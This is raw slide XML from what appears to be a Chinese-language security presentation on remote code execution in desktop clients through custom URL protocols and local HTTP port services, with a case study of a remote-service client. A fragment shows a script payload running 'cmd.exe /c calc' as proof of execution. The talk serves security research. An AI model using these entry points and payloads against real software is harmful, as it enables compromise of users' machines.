                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>("C:/Windows/System32/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>", "/c calc");&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2599501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85800" y="788522"/>
            <a:ext cx="3187700" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>传统客户端问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85801D5C-8244-113F-A8D9-C0CF9844D1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="279400" y="877671"/>
            <a:ext cx="210961" cy="344922"/>
            <a:chOff x="0" y="369310"/>
            <a:chExt cx="210961" cy="344922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="三角形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A943880-981E-AA20-0472-668FC888D219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-92886" y="462196"/>
              <a:ext cx="344922" cy="1591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20" name="三角形 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76F2B24-A574-6552-8060-8EF196D4CDD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-41075" y="462196"/>
              <a:ext cx="344922" cy="159150"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B0F0">
                <a:alpha val="872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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C676B0-9AB8-696D-5783-AA17AEC3AADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="262772" y="2071299"/>
            <a:ext cx="11666456" cy="3293209"/>
            <a:chOff x="262772" y="2380788"/>
            <a:chExt cx="11666456" cy="3293209"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B65DBA-B440-E737-C7B3-12281A1E5A68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="21940"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6661963" y="2837954"/>
              <a:ext cx="5267265" cy="2378876"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B292305-1DF2-BBC4-88D7-B4993A281CC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="262772" y="2380788"/>
              <a:ext cx="6602695" cy="3293209"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>攻击入口：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1"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1.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 伪协议</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> -&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Xxx</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>://xxx/action</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 本地网络端口服务 </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>-&gt; http://127.0.0.1:38230/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxx?xxx</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=xxx</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>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b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>风险：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1"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1. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>本地网络端口服务单个请求或多个组合请求结合存在</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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2.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 伪协议导致的某些功能存在</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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a:t>
              </a:r>
            </a:p>
            <a:p>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zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>影响面（举例说明）：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1"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C++/C</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语言客户端：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>VPN</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、远程服务平台、视频软件、邮箱客户端。</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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906774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
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B806ACC9-91BD-BDA2-9BB0-44A272027F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872441" y="3198168"/>
            <a:ext cx="6447118" cy="461665"/>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传统客户端问题：某远程服务平台客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2413211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某远程服务平台客户端</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9FBF86EC-2B98-CB4D-49BA-9F55F3B7B7FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="968677" y="2072387"/>
            <a:ext cx="10254646" cy="3371708"/>
            <a:chOff x="1227664" y="2297471"/>
            <a:chExt cx="10254646" cy="3371708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B5B2463-882B-A2D6-DF10-9CD0ED0C0F48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1826057" y="4117800"/>
              <a:ext cx="3188217" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>38230</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>端口可以    直接</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>访问</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D322F7BA-D5EC-F5DF-805B-936411A993FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1308346" y="2889021"/>
              <a:ext cx="4364835" cy="1174834"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C34F9A-3C77-8DF9-0191-AE8D400276FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="1" r="43742"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1308346" y="4532448"/>
              <a:ext cx="4340615" cy="1037089"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D736CEF-A939-41EC-A2DF-6C483156831E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6340764" y="2337812"/>
              <a:ext cx="5141543" cy="1816100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直线箭头连接符 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD50230-5C8D-786F-EE2F-0052249AE725}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3443055" y="4112704"/>
              <a:ext cx="0" cy="357097"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABFEBE5B-9340-57A5-E86D-23D738F279FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1227664" y="2297471"/>
              <a:ext cx="4364835" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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通过</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HRSword</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>查看对应进程监听的本地端口：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>38227</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>38230</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623F2FD8-81FA-C095-2360-5942E6172515}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6217546" y="4300524"/>
              <a:ext cx="4175551" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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根据</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的响应字符串定位到对应的功能点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="图片 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938D895E-B7EB-6712-0D11-B87CCB2BC9EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect l="55418" r="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6340765" y="4798989"/>
              <a:ext cx="3218616" cy="850798"/>
